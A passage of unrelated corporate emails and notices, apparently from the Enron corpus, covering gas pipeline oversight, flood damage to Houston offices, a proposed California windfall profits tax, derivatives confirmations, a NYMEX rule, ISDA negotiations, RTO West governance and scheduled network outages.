transmission of natural gas, which has in turn contributed to the spiraling cost of electricity generation in the state. The CPUC maintains that the price of natural gas transmitted by the El Paso pipeline has been manipulated so that prices in California over the last year have been up to five times the national average. Because an increasing number of states, including California, rely heavily on natural gas fired power plants, any manipulation of that commodity can have severe consequences. Additionally, because such a large percent of our future nationwide generation capacity will use natural gas, we are concerned that these types of alleged market abuses will have even more profound effects. Therefore, we ask GAO to answer the following questions: 1) Has FERC fully met its responsibilities to adequately regulate interstate pipelines? If not, what areas require improvement? 2) Is there a continuing role for FERC to play in ensuring equal access to the limited amount of space in our current natural gas pipelines? Should this role be enhanced or clarified, and if so, how? 3) Is there the possibility of this same type of alleged abuse in other parts of the country, aside from California, where the natural gas pipeline capacity is similarly limited? Please provide any details.We appreciate all the good work that GAO does and we look forward to hearing from you soon. Sincerely,J oseph I. Lieberman Jean Carnahan
Bill/Philippe- Below is a summary of the major problems which occurred the past 96 hours and the steps taken to mitigate the damage and risk. Enron Center North (1400 Smith) As a result of the flooding downtown, approximately six skyscrapers had their electrical vaults flooded and began to cause cascading problemd in the electrical grid downtown. The net result was the loss of one of the two 35kv circuits which serve 1400 Smith. We (engineers, EES Maint, electrical subs) believe at the time the circuits blew we shifted from three phase to single phase power, which caused an imbalance in the load to the building. Consequently, UPS "C" which serves a portion of the Lv 34 Data Ctr, the Rolm phone switch, and a protion of the Traders floors lost a circuitboard, and blew two internal fuses. This power degradation caused PDU "S" on Lv 34 to trip its main breaker and shutdown power load to servers and equipment on this PDU. This occurred shortly after Noon on Saturday. Response/Restoration > UPS "D" transferred load from UPS "C" as the N+1 back up and carried the full load of the UPS loss as designed > EPSC/electrical sub (Henderson Electric); EES Maint; IT worked together to power down systems to begin repair work by 4:00pm Saturday > EPSC/EES Maint coordinated with Pillar/Henderson Elec to obtain replacement parts and begin the repairs. By 9:30pm all repairs to UPS"C" had been made and the system bought back on line. As a measure of extra protection the back up genset for Enron Ctr North was in operation > Reliant Energy restored the circuit at approximately 10:30pm Saturday evening > EPSC/EES Maint and subs conducted a thorough review of all electrical and back up systems Saturday evening > Enron Network IT Operations began restoration of all affected systems Saturday evening > EPSC/EES Maint obtained diesel fuel and topped off all gensets Saturday in case of additional problems and due to fuel consumption during the outage Other Building damage was limited to flooding in the tunnels, and water damage/flooding to portions of the Body Shop on Lv B-1 Enron Center South (1500 Louisiana) Impact/Damage Summary > Levels 8 & 9 received very limited amounts of water from the core area elevator shafts and exterior curtainwall. There was no exposure to water on any systems or network cabling during the entire period. (Response) Crews contained and cleaned all water as it traced into the building. > ALL IDF closets on Lvs 3-5 Traders Floors remained dry throughout the duration of the rains/flooding on Friday & Saturday > Lv 6 received some water from Lv 7. (Response) The area was contained and cleaned. No additional damage beyond Tuesday evenings flooding occurred > Due to extreme street flooding and water pressure, a 10" sanitary sewer line tied into ECS burst on Friday evening causing extensive flooding of Lv B-1 area (approximately 4-6 inches of water in the basement. (Response) Clark & Way Engr was able to install a temporary plug in the line to stop the on going flood waters from penetrating the basement. Clean up has continued throughout the weekend > Due to the extreme flooding and water pressure, the water seal of the Reliant Vault burst early Saturday and flooded the electrical vault room with 24-30" of water. This resulted in a complete loss of power at approximately 1:30pm on Staurday afternoon. The back up systems engaged and operated per design to support the Data Ctr and Traders Floors. The temporary cooling tower went off line. Prior to the flooding Clark had been in the process of tieing in the temporary feed into the back up system by 7-1-01 in prep for the migration (Response) * Clark used back up water pumps to pump out and clean the Reliant electrical vault, as well as maintained operation of the back up systems * The Data Ctr AHU's were kept on line with the dehumidifiers/blowers to modulate the airflow in the Data Ctr. EPSC had Way Engr techs use temp/humidity probes to monitor the areas. The recordings indicated temps on Lvs 8 & 9 did not exceed 78 degrees and relative humidity did not exceed 68% during the outage * Clark/Fisk Elec/EPSC coordinated desing efforts and obtained gear on an emergency basis and completed the tie in off the temporary coolong tower to the generators by 10:30pm * Reliant Energy is still cleaning and replacing gear in th vault room. Presntly (AT 11:00PM Sunday) we have one circuit operational in the building and 50% of the Reliant gear on line). We are still operating all systems safely on the back up sytems for the past 36 hours. It is expected Relaint will be complete by 7:00am. Clark; the engineers and MEP subs shall be conducting a thorough system review and repirs as required of all systems throughout the building during the coming week. In summary, the back up systems in both facilities did engage and operate as designed; however, due to the extreme conditons and stress placed upon the systems the facility held up extremely well. I would also like to note throughout the ordeal beginning Friday evening through Sunday, everyone (Enron NetWorks;EES FacilitiesClark Const;Way Engring;Fisk Electric;Henderson Electric; KW-Pillar;Hines) did an outstanding job under enourmous pressure and the most severe conditions I have seen in downtown Houston. Communication, around the clock work and cool heads managed to assess damage and develop action/restoration plans to facilitate repairs for Monday business Let me know if you need further details on specific issues or items. regards- Henry
The key state democratic legislators are working behind the scenes to develop a Windfall Profits Tax bill in retaliation for high wholesale prices. It is not yet in print. Here is an analysis of the expected bill by an attorney for the Independent Energy Producers. Sue Mara Enron Corp. Tel: (415) 782-7802 Fax:(415) 782-7854 ----- Forwarded by Susan J Mara/NA/Enron on 04/04/2001 09:40 AM ----- "Steven Kelly" <[email protected]> 04/04/2001 08:55 AM To: "'Alex Sugaoka (E-mail)'" <[email protected]>, "'Bill Carlson (E-mail)'" <[email protected]>, "'Bill Woods (E-mail)'" <[email protected]>, "'Bob Ellery (E-mail)'" <[email protected]>, "'Bob Escalante (E-mail)'" <[email protected]>, "'Bob Gates (E-mail)'" <[email protected]>, "Bob Szymanski (E-mail)" <[email protected]>, "'Carolyn A Baker (E-mail)'" <[email protected]>, "'Cody Carter (E-mail)'" <[email protected]>, "'Curt Hatton (E-mail)'" <[email protected]>, "'Curtis Kebler (E-mail)'" <[email protected]>, "'David Parquet'" <[email protected]>, "'Dean Gosselin (E-mail)'" <[email protected]>, "'Doug Fernley (E-mail)'" <[email protected]>, "'Douglas Kerner (E-mail)'" <[email protected]>, "'Duane Nelsen (E-mail)'" <[email protected]>, "'Ed Tomeo (E-mail)'" <[email protected]>, "'Eileen Koch (E-mail)'" <[email protected]>, "'Eric Eisenman (E-mail)'" <[email protected]>, "'Frank DeRosa (E-mail)'" <[email protected]>, "Frazier Blaylock (E-mail)" <[email protected]>, "'Greg Blue (E-mail)'" <[email protected]>, "'Hap Boyd (E-mail)'" <[email protected]>, "'Hawks Jack (E-mail)'" <[email protected]>, "'Jack Pigott (E-mail)'" <[email protected]>, "'Jim Willey (E-mail)'" <[email protected]>, "'Joe Greco (E-mail)'" <[email protected]>, "'Joe Ronan (E-mail)'" <[email protected]>, "'John Stout (E-mail)'" <[email protected]>, "'Jonathan Weisgall (E-mail)'" <[email protected]>, "'Kate Castillo (E-mail)'" <[email protected]>, "'Kelly Lloyd (E-mail)'" <[email protected]>, "'Ken Hoffman (E-mail)'" <[email protected]>, "'Kent Fickett (E-mail)'" <[email protected]>, "'Kent Palmerton'" <[email protected]>, "'Lynn Lednicky (E-mail)'" <[email protected]>, "Mark Fillinger (E-mail)" <[email protected]>, "Marty McFadden (E-mail)" <[email protected]>, "Paula Soos (E-mail)" <[email protected]>, "Rachel King (E-mail)" <[email protected]>, "'Randy Hickok (E-mail)'" <[email protected]>, "Rick S. Koebbe (E-mail)" <[email protected]>, "'Roger Pelote (E-mail)'" <[email protected]>, "'Ross Ain (E-mail)'" <[email protected]>, "'Stephanie Newell (E-mail)'" <[email protected]>, "'Steve Lliff (E-mail)'" <[email protected]>, "'Steve Ponder (E-mail)'" <[email protected]>, "'Susan J Mara (E-mail)'" <[email protected]>, "'Tony Wetzel (E-mail)'" <[email protected]>, "'William Hall (E-mail)'" <[email protected]> cc: "Julee Malinowski-Ball (E-mail)" <[email protected]>, "Andy Brown (E-mail)" <[email protected]>, "'Carol Hudson (E-mail)'" <[email protected]>, "'Jan Smutny-Jones (E-mail)'" <[email protected]>, "'Katie Kaplan (E-mail)'" <[email protected]>, "'Steven Kelly (E-mail)'" <[email protected]> Subject: FW: Proposed Windfall Profit Tax FYI. Preliminary analysis of State Windfall Profit Tax. This will be discussed during the cc scheduled for 9:00 a.m. today, Wed. -----Original Message----- From: C. Stephen Davis [mailto:[email protected]] Sent: Wednesday, April 04, 2001 8:33 AM To: Steven Kelly Cc: Douglas K. Kerner Subject: Proposed Windfall Profit Tax Gentlemen: I understand that the some of the Democratic leadership of the California Legislature is contemplating a charge against the electric-generating industry in retaliation for recent price increases. The charge is to be styled as a "windfall profit tax" modeled on President Carter's tax on oil company profits following deregulation of oil prices in 1980 (The Crude Oil Windfall Profit Tax Act of 1980, 26 USC 4986 et seq.). The Carter Windfall Profit Tax was levied on the difference between the current wellhead price of the oil and the sum of the adjusted base price set by Congress, multiplied by the applicable rate. I understand the California charge will similarly be calculated by reference to a 1999 base price and current prices, to which difference some sort of tax rate will be applied. You asked whether this approach to punishing electric wholesalers was infirm from either a policy or legal perspective. The basic policy problem is that the tax will discourage sales of electricity in California. California will become the market of last resort. Another problem is that the Tax might be seen as promoting a "California First" policy at the expense of other states. This is so because the Tax could well be included in the FERC rate base as "taxes other than income taxes," and thereby be shifted to other customers. The Tax may suffer from legal flaws as well. The principal problem is preemption by The Federal Power Act. The states are prohibited from regulating wholesale power rates as a direct burden on interstate commerce. The proposed charge, whether called a "windfall profit tax" or an excise tax or a sales or use tax or something else, is underground rate making. There is little or no practical difference between a rate cap and a tax on all revenues measured with reference to a certain price point from the perspective of the interstate electric wholesaler. Thus, the burden on interstate commerce posed by direct rate regulation and taxing revenues using a price base is comparable. The Tax may also constitute an unconstitutiional taking if the price allowed is less than the cost of production and a reasonable return. The proposed historical base price will not, for example, reflect recent fuel price increases. Two other potential issues arise as well. First, the tax has many of the hallmarks of a use tax, i.e., the tax is levied on the purchase of goods from an out-of-state provider for delivery to and use in California. The gross receipts form the sale of electricity have been exempt from sales and use tax for more than 50 years. Rev. & Tax. Code Section 6353. While this statute could, presumably, be amended, doing so would be a major policy departure and a big step towards imposing sales tax on utility sales. A second concern is the possible impairment of existing contracts as a result of the Legislature's meddling in rate regulation. I was unable to identify any instance in which a state imposed a windfall profit tax on electricity sales. The forgoing is the product of my conversations last evening with Doug Kerner and a few hours of LEXIS research. The issues are complex and could not be much developed in the time available. This material is best viewed as informed "issue spotting." Nevertheless, I feel strongly that the proposed "Tax" can fairly be characterized as rate making. Very Truly Yours, C. Stephen Davis
Sara, Looks like we never received the forward confirmations. We did receive the put confirmations, which were received last week. Please have the forward confirmations faxed to me today at 646-758-4819. Russell F. Hackmann, CFA Lehman Brothers Corporate Equity Derivatives (201) 524-2279 phone (917) 596-2936 cell [email protected] > -----Original Message----- > From: Shackleton, Sara [SMTP:[email protected]] > Sent: Monday, October 15, 2001 4:44 PM > To: Hackmann, Russell > Subject: FW: Re: confirmation of agreement--Enron > > Russ: > > The forwards and puts should be signed and faxed back to Lehman. Please > note the template for these trades (with respect to the definition of > "material") left out the word "into". I didn't find it necessary to > impede Enron Corp.'s signature; just let Phil know for the next deal. > Thanks. Sara > > Sara Shackleton > Enron Wholesale Services > 1400 Smith Street, EB3801a > Houston, TX 77002 > Ph: (713) 853-5620 > Fax: (713) 646-3490 > > > -----Original Message----- > From: Armogida, Jim > Sent: Monday, October 01, 2001 9:16 AM > To: Shackleton, Sara > Subject: FW: Re: confirmation of agreement--Enron > > > Here it is, Sara. > > > > -----Original Message----- > From: Ladas, Michael [mailto:[email protected]] > Sent: Friday, September 28, 2001 1:28 PM > To: Despain, Tim; Armogida, Jim; Freeland, Clint > Cc: Karna, Angie; Hackmann, Russell > Subject: RE: Re: confirmation of agreement--Enron > > > Tim - we are comfortable with the changes to the definition of > "material" > given that Lehman is not entering the market as a result of "rolling" > the > transaction. Should we amend the transaction in or enter in any future > transaction where we enter the market on behalf of ENE, we would require > the > "standard" definition of "material. > > Mike Ladas > p.201-524-2279 > c.646.319.3220 > [email protected] > > > -----Original Message----- > > From: Despain, Tim [SMTP:[email protected]] > > Sent: Friday, September 28, 2001 1:25 PM > > To: Ladas, Michael > > Subject: FW: Re: confirmation of agreement--Enron > > > > > > As discussed. > > > > Tim > > > > > > > -----Original Message----- > > > From: Armogida, Jim > > > Sent: Friday, September 28, 2001 11:42 AM > > > To: '[email protected]' > > > Cc: Freeland, Clint; Glisan, Ben; Despain, Tim; Walls Jr., Rob; > > > Rogers, Rex > > > Subject: Re: confirmation of agreement--Enron > > > > > > Russ--Clint is out today, but the confirmation document is fine > except > > > that there is a tweak we need to make to the definition of > "material" > > > information contained in the representation by Party B in the > > > confirmation. It should read as follows: > > > > > > "Material" information for these purposes is any information to > > > which Party A would reasonably attach importance in entering into > this > > > Transaction or placing any order with respect to this Transaction. > > > > > > > > > I assume this is satisfactory. If not or you would otherwise like > to > > > discuss it, please contact Rex Rogers at 853-3069 since I will be > out > > > of the office later today. Thanks. > > > > > > > > > > > > > > > ********************************************************************** > > This e-mail is the property of Enron Corp. and/or its relevant > affiliate > > and may contain confidential and privileged material for the sole use > of > > the intended recipient (s). Any review, use, distribution or > disclosure by > > others is strictly prohibited. If you are not the intended recipient > (or > > authorized to receive for the recipient), please contact the sender or > > reply to Enron Corp. at [email protected] and > > delete all copies of the message. This e-mail (and any attachments > hereto) > > are not intended to be an offer (or an acceptance) and do not create > or > > evidence a binding and enforceable contract between Enron Corp. (or > any of > > its affiliates) and the intended recipient or any other party, and may > not > > be relied on by anyone as the basis of a contract by estoppel or > > otherwise. Thank you. > > ********************************************************************** > > > ------------------------------------------------------------------------ > ------ > This message is intended only for the personal and confidential use of > the designated recipient(s) named above. If you are not the intended > recipient of this message you are hereby notified that any review, > dissemination, distribution or copying of this message is strictly > prohibited. This communication is for information purposes only and > should not be regarded as an offer to sell or as a solicitation of an > offer to buy any financial product, an official confirmation of any > transaction, or as an official statement of Lehman Brothers. Email > transmission cannot be guaranteed to be secure or error-free. > Therefore, we do not represent that this information is complete or > accurate and it should not be relied upon as such. All information is > subject to change without notice. > > ------------------------------------------------------------------------------ This message is intended only for the personal and confidential use of the designated recipient(s) named above. If you are not the intended recipient of this message you are hereby notified that any review, dissemination, distribution or copying of this message is strictly prohibited. This communication is for information purposes only and should not be regarded as an offer to sell or as a solicitation of an offer to buy any financial product, an official confirmation of any transaction, or as an official statement of Lehman Brothers. Email transmission cannot be guaranteed to be secure or error-free. Therefore, we do not represent that this information is complete or accurate and it should not be relied upon as such. All information is subject to change without notice.
Notice # 01-154 May 7, 2001 TO: All NYMEX Division Members and Member Firms FROM: Neal L. Wolkoff, Executive Vice President RE: Implementation of New NYMEX Rule 9.11A ("Give-Up Trades") DATE: May 7, 2001 =========================================================== Please be advised that beginning on the trade date of Friday, June 1, 2001, new NYMEX Rule 9.11A ("Give-Up Trades") will go into effect. ! In the absence of an applicable give-up agreement, new Rule 9.11A will define the respective responsibilities/obligations to an order of executing brokers, customers and Clearing Members. ! The term "executing broker" as used in Rule 9.11A refers to the registered billing entity, Member Firm or Floor Broker to whom the order is transmitted. ! Rule 9.11 will provide that, in the absence of an applicable give-up agreement, a Clearing Member may reject a trade only if: (1) the trade exceeds trading limits established by the Clearing Member for that customer that have been communicated to the executing broker as provided by the rule or (2) the trade is an error for which the executing broker is responsible. ! The new rule also places affirmative obligations on executing brokers to confirm Clearing Member authorization for an account. For example, prior to an executing broker accepting and executing an initial order for any new customer account, such executing broker must confirm with the Clearing Member by telephonic, electronic or written means, that: (a) the customer has a valid account with the Clearing Member; (b) the account number; (c) the brokerage rate; (d) the customer is authorized by the Clearing Member to place orders with the executing broker for that account; and (e) a listing or summary of persons authorized to place orders for that account. Moreover, the executing broker must retain a copy of the authorization or the specifics of the telephonic confirmation, which includes: opposite party, date, time, and any other relevant information. The Compliance Department will conduct periodic audits of such records, and falsification of such information shall be the basis for disciplinary action. If you have any questions concerning this new rule, please contact Bernard Purta, Senior Vice President, Regulatory Affairs and Operations, at (212) 299- 2380; Thomas LaSala, Vice President, NYMEX Compliance Department, at (212) 299-2897; or Arthur McCoy, Vice President, Financial Surveillance Section, NYMEX Compliance Department, at (212) 299-2928, NEW RULE 9.11A ("Give-Up Trades") (Entire rule is new.) Rule 9.11A Give-Up Trades In the absence of a give-up agreement whose terms and conditions govern the responsibilities/obligations of executing brokers, customers and Clearing Members, the following rules shall define the respective responsibilities/obligations of those parties to an order. The "executing broker", as used in this rule, is the registered billing entity, Member Firm or Floor Broker to whom the order is transmitted. (A) Responsibilities/Obligations of Clearing Members (1). Limits Placed by Clearing Member. A Clearing Member may, in its discretion, place trading limits on the trades it will accept for give-up for a customer's account from an executing broker, provided however, that the executing broker receives prior written or electronic notice from the Clearing Member of the trading limits on that account. Notice must be received by the executing broker in a timely manner. A copy of such notice shall be retained by the Clearing Member. (2). Trade Rejection. A Clearing Member may reject ("DK") a trade only if: (1) the trade exceeds the trading limits established under Section I(A) of this rule for that customer and it has been communicated to the executing broker as described in Subsection (A); or (2) the trade is an error for which the executing broker is responsible. If a Clearing Member has a basis for rejecting a trade, and chooses to do so in accordance with the provisions of Rule 2.21(B), it must notify the executing broker promptly. (3). Billing. A Clearing Member will pay all floor brokerage fees incurred for all transactions executed by the executing broker for the customer and subsequently accepted by the Clearing Member by means of the ATOM system. Floor brokerage fees will be agreed upon in advance among the Clearing Member, customer and the executing broker. (B) Responsibilities/Obligations of Executing Brokers (1) Customer Order Placement. An executing broker will be responsible for determining that all orders are placed or authorized by the customer. Once an order has been accepted, a broker or the broker's clerk must: (a) confirm the terms of the order with the customer; (b) accurately execute the order according to its terms; (c) confirm the execution of the order to the customer as soon as practicable; and (d) transmit such executed order to the Clearing Member as soon as practicable in accordance with Exchange Rules and procedures. 2. Use of Other Persons. Unless otherwise agreed in writing, the executing broker is allowed to use the services of another broker in connection with the broker's obligations under these rules. The executing broker remains responsible to the customer and Clearing Member under these rules. 3. Executing Broker Responsibility for Verifying Clearing Member Authorization. Prior to a broker accepting and executing an initial order for any new customer account, the executing broker must confirm with the Clearing Member by telephonic, electronic or written means, that: (f) the customer has a valid account with the Clearing Member; (g) the account number; (h) the brokerage rate; (i) the customer is authorized by the Clearing Member to place orders with the executing broker for that account; and (j) a listing or summary of persons authorized to place orders for that account. The executing broker must retain a copy of the authorization or the specifics of the telephonic confirmation, which includes: opposite party, date, time, and any other relevant information. The falsification of such information shall be the basis for disciplinary action. 4. Rejection of Customer Order. Where an executing broker has confirmed Clearing Member authorization to execute orders on behalf of a customer in accordance with this Rule 9.11A, the broker may, in the broker's discretion, reject an order that the customer transmits to the broker for execution. The broker shall promptly notify the customer and the Clearing Member(s) of any such rejection. Carr Futures 150 S. Wacker Dr., Suite 1500 Chicago, IL 60606 USA Tel: 312-368-6149 Fax: 312-368-2281 [email protected] http://www.carrfut.com
I apologize, I have been out sick until this afternoon and have not gotten to it. I think, if memory serves me correctly, I think I was generally ok with the language except for the proviso at the end because we do not know what your internal policies are and how you would evaluate the assignee. It basically strips out the right because it still leaves us subject to Enron's caprice. Could you perhaps give me a better sense as to what the criteria would be? Thanks Yair Yaish Director and Senior Counsel Allegheny Energy Global Markets, LLC 212-236-7955 -----Original Message----- From: [email protected] [mailto:[email protected]] Sent: Wednesday, April 18, 2001 7:16 PM To: [email protected] Subject: RE: ISDA Schedule/Paragraph 13 Yair: Are we finished? Please let me know. Thanks. Sara Shackleton Enron North America Corp. 1400 Smith Street, EB 3801a Houston, Texas 77002 713-853-5620 (phone) 713-646-3490 (fax) [email protected] "Yaish, Yair (OGC)" To: "'[email protected]'" <[email protected]> <YYaish@exchan cc: ge.ml.com> Subject: RE: ISDA Schedule/Paragraph 13 04/13/2001 08:42 AM I hope to leave by 3:30 Eastern Time. Thanks for getting back to me so quickly. Though, I'm surprised u guys are open for business today. -----Original Message----- From: [email protected] [mailto:[email protected]] Sent: Friday, April 13, 2001 9:41 AM To: [email protected] Subject: RE: ISDA Schedule/Paragraph 13 Yair: I've left a message with Tracy Ngo (in Portland) and will let you know as soon as I hear from her. How long will you be in the office today? Sara Shackleton Enron North America Corp. 1400 Smith Street, EB 3801a Houston, Texas 77002 713-853-5620 (phone) 713-646-3490 (fax) [email protected] "Yaish, Yair (OGC)" To: "'[email protected]'" <[email protected]> <YYaish@exchan cc: ge.ml.com> Subject: RE: ISDA Schedule/Paragraph 13 04/13/2001 08:28 AM Sara, Allegheny would like to be able to assign to affilaites in the same manner that we are allowing Enron to make an ssignment so long as the Gty goes along. In our case, however, there is no gty, hence the stipualtion that such assignment must be to an entity with an equal or better credit rating. If you wish, I can limit such assignment to an entity rated at least BBB+ or better. Would that resolve your concerns? -----Original Message----- From: [email protected] [mailto:[email protected]] Sent: Thursday, April 12, 2001 12:26 PM To: [email protected] Subject: RE: ISDA Schedule/Paragraph 13 Yair: It's a good thing you didn't try to get back to me! Sorrry. (See attached file: AlleghenyCPformacceptR1.DOC) Sara Shackleton Enron North America Corp. 1400 Smith Street, EB 3801a Houston, Texas 77002 713-853-5620 (phone) 713-646-3490 (fax) [email protected] "Yaish, Yair (OGC)" To: "'[email protected]'" <[email protected]> <YYaish@exchan cc: ge.ml.com> Subject: RE: ISDA Schedule/Paragraph 13 04/12/2001 10:16 AM Sara, sorry i didn't get back to you yesterday, I was out sick. I didn't notice anything attached, did u send a subsequent e-mail? -----Original Message----- From: [email protected] [mailto:[email protected]] Sent: Wednesday, April 11, 2001 4:01 PM To: [email protected] Cc: [email protected] Subject: RE: ISDA Schedule/Paragraph 13 Importance: High Yair: Attached is my redline. Call me so that we can discuss the remaining issues, including: (1) Calculation Agent. We believe that the existing dispute mechanism is adequate. (2) Procedures for Entering into Transactions. There is no procedure for dual confirms. This is too confusing. (3) Transfer. We cannot agree to your assignment provision as it is too subjective. The other changes were not substantive. Sara Shackleton Enron North America Corp. 1400 Smith Street, EB 3801a Houston, Texas 77002 713-853-5620 (phone) 713-646-3490 (fax) [email protected] "Yaish, Yair (OGC)" To: "'[email protected]'" <[email protected]> <YYaish@exchan cc: ge.ml.com> Subject: RE: ISDA Schedule/Paragraph 13 04/10/2001 07:46 AM Sara, any thoughts on my comments ISDA I sent out last week? -----Original Message----- From: Yaish, Yair (OGC) Sent: Thursday, April 05, 2001 6:19 PM To: '[email protected]' Subject: RE: ISDA Schedule/Paragraph 13 Sara, I have good news, I think we are very close to executing this baby. I am attahcing comments to the ISDA. They reflect comments by our outside cousel which highlight the differences between this contract and the side letter/ML ISDA. They are not much. I have also made some changes directly on their draft where I either concurred with Enron or needed to make some of my own changes. Pls review and let me know what you think. I will be leaving the office soon, so if we can wrap it up tomorrow that would be great (I'm out Monday for Passover). Yair Yaish Director and Senior Counsel Allegheny Energy Global Markets, LLC 212-236-7346 -----Original Message----- From: [email protected] [mailto:[email protected]] Sent: Friday, March 30, 2001 4:10 PM To: [email protected] Subject: ISDA Schedule/Paragraph 13 Yair: Attached is a blacklined (against the Enron North America Corp. draft of 3/15/01) Schedule and Paragraph 13 to the ISDA Credit Support Annex. I have tried to incorporate the essence of the March 19, 2001 "swap side letter agreement." Please call me to discuss as it would be nice to finalize by April 6. Thanks. (See attached file: 098a Blackline ctr (Allegheny Energy Supply).doc) Sara Shackleton Enron North America Corp. 1400 Smith Street, EB 3801a Houston, Texas 77002 713-853-5620 (phone) 713-646-3490 (fax) [email protected]
Legal Work Group Please find attached Eric Freedman's status report on his sub group's activities for your information and for discussion at our meeting next week. Barney Speckman RTO West KEMA Team Portland Office Phone 503-258-0475 RTO West Offices 5933 NE Win Sivers Drive Portland, Oregon BMS Consulting 2130 Belford Drive Walnut Creek, Calif. 94598 925-287-0365 (Walnut Creek Phone and Fax) Return-Path: <[email protected]> Received: from rly-yb04.mx.aol.com (rly-yb04.mail.aol.com []) by air-yb05.mail.aol.com (v74.17) with ESMTP; Thu, 22 Jun 2000 02:07:20 -0400 Received: from excon.prestongates.com (host96-69.prestongates.com []) by rly-yb04.mx.aol.com (v74.17) with ESMTP; Thu, 22 Jun 2000 02:06:54 2000 Received: by excon.prestongates.com with Internet Mail Service (5.5.2651.58) id <N224MSM9>; Wed, 21 Jun 2000 23:07:28 -0700 Message-ID: <[email protected]> From: "Freedman, Eric (SEA)" <[email protected]> To: "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "xx-Christensen, Eric (SNO PUD)" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]> Cc: "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]>, "'[email protected]'" <[email protected]> Subject: Bylaws, Articles, Tax Status Subgroup -- Status Report Date: Wed, 21 Jun 2000 23:07:58 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2651.58) Content-Type: text/plain; charset="iso-8859-1" This e-mail is intended to reach all of those who have expressed an interest in being part of the Legal Work Group subgroup addressing the RTO bylaws, articles and tax status. Please let me know if my e-mail distribution list is missing anyone who would like to participate in the subgroup. I would divide the immediate tasks before us into four main categories: 1. General Governance Issues (Especially RTO Membership, Board Composition and Technical Advisory Committee Issues) At the Governance Workshop on June 15, we had a good discussion of issues relating to the appropriate number and scope of membership classes, board composition and method of selecting the members of the Technical Advisory Committee. Barney Speckman is in the process of scheduling a meeting in early July for a continuation of discussion of these topics and any other governance issues that may be of interest. 2. Board and Employee Conflict of Interest Provisions/Board Member Qualifications One element of the RTO bylaws that will require a fair amount of thought and discussion is the appropriate nature and extent of the trustee and employee disqualification/conflict of interest provisions. Another such element is the required qualifications of the RTO board members. John Buechler of the New York ISO has prepared for us a good summary of the board member qualifications that have been adopted or are under consideration by various existing or proposed ISOs, and Barney Speckman will distribute copies of John's summary to the group. I would like to have a discussion of these issues at the next meeting, with the aim of preparing and circulating one or more straw man proposals as soon thereafter as possible. 3. Consideration of Jurisdiction of Incorporation/Conforming Revisions to Bylaws IndeGO was proposed to be formed in Utah, in large part because Utah's nonprofit corporation law was determined as of three years ago to contain the most favorable provisions for trustee indemnification of any state in which IndeGO was proposed to operate. RTO West, the nonprofit corporation that is serving as the vehicle for our RTO in formation, was incorporated this spring in Washington in large part on the strength of Washington's provisions for indemnification of nonprofit corporation trustees. Our subgroup needs to review the laws of the states in which RTO West would operate, and come up with a recommendation as to whether consideration should be given to incorporation of the RTO in any state other than Washington. Once a determination is made as to the appropriate state for incorporation, the bylaws will need to be conformed to the requirements of that state's nonprofit corporation law. Anyone who is interested in helping out on these fronts is most welcome. 4. Potential RTO Application for Tax Exemption The California ISO has been qualified for exemption from federal income tax, and a determination needs to be made whether such qualification would be appropriate for RTO West as well. Our subgroup has been given the task of identifying the relevant considerations to be taken into account in making the determination whether to seek tax-exempt status. Robb Roberts and Sanjiv Kripalani have expressed interest in helping to undertake this analysis. If any of the rest of you is interested in participating, please let me know. I will be out of the office for the next week-and-a-half, but will be checking voice mail and e-mail regularly. I look forward to seeing you all soon. Eric Eric E. Freedman Preston Gates & Ellis LLP 701 Fifth Avenue, Suite 5000 Seattle, WA 98104-7078 Phone: (206) 623-7580 x 7727 Direct: (206) 224-7327 FAX: (206) 623-7022 E-mail: [email protected] CONFIDENTIALITY STATEMENT: The foregoing message contains information that is protected by the attorney-client privilege. If this message was sent to you in error, any use, disclosure or distribution of its contents is prohibited. If you received this message in error, please call Preston Gates & Ellis LLP at the number listed above, and delete this message without copying it. Thank you.
------------------------------------------------------------------------------------------------------ W E E K E N D S Y S T E M S A V A I L A B I L I T Y F O R May 4, 2001 5:00pm through May 7, 2001 12:00am ------------------------------------------------------------------------------------------------------ SCHEDULED SYSTEM OUTAGES: ARDMORE DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages. AZURIX: No Scheduled Outages. EB34 DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages. EDI SERVER: No Scheduled Outages. ENRON CENTER SOUTH DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages ENRON NORTH AMERICAN LANS: Impact: ENS Time: Fri 5/4/2001 at 9:00:00 PM CT thru Fri 5/4/2001 at 10:00:00 PM CT Fri 5/4/2001 at 7:00:00 PM PT thru Fri 5/4/2001 at 8:00:00 PM PT Sat 5/5/2001 at 3:00:00 AM London thru Sat 5/5/2001 at 4:00:00 AM London Outage: Consolidation Of Networks Environments Impacted: ENA Purpose: Consolidating Network Equipment. Moving networks,,, and from 3460 to 3405. Backout: Contact(s): George Nguyen 713-853-0691 Impact: CORP Time: Sat 5/5/2001 at 1:00:00 PM CT thru Sat 5/5/2001 at 7:15:00 PM CT Sat 5/5/2001 at 11:00:00 AM PT thru Sat 5/5/2001 at 5:15:00 PM PT Sat 5/5/2001 at 7:00:00 PM London thru Sun 5/6/2001 at 1:15:00 AM London Outage: Migrating EES VLANs from EB3405-cx11 and EB3405-cx12 to EB3405-cx13 and EB3405-cx14 Environments Impacted: EES Purpose: Off-load CPU usage onto current EB3405-CX13 and EB3405-CX14; increase throughput and redundancy. Backout: Remove EB3405-CX13 and EB3405-CX14. Replace original access-links connecting HOUCX1 and HOUCX2 back to EB3405-CX11 and EB3405-CX12. Contact(s): Michael Huang 713-875-2478 877-692-2751 Impact: ENS Time: Fri 5/4/2001 at 10:30:00 PM CT thru Sat 5/5/2001 at 12:00:00 AM CT Fri 5/4/2001 at 8:30:00 PM PT thru Fri 5/4/2001 at 10:00:00 PM PT Sat 5/5/2001 at 4:30:00 AM London thru Sat 5/5/2001 at 6:00:00 AM London Outage: Migrating Networks Off Cisco 3 and Cisco 4 Environments Impacted: 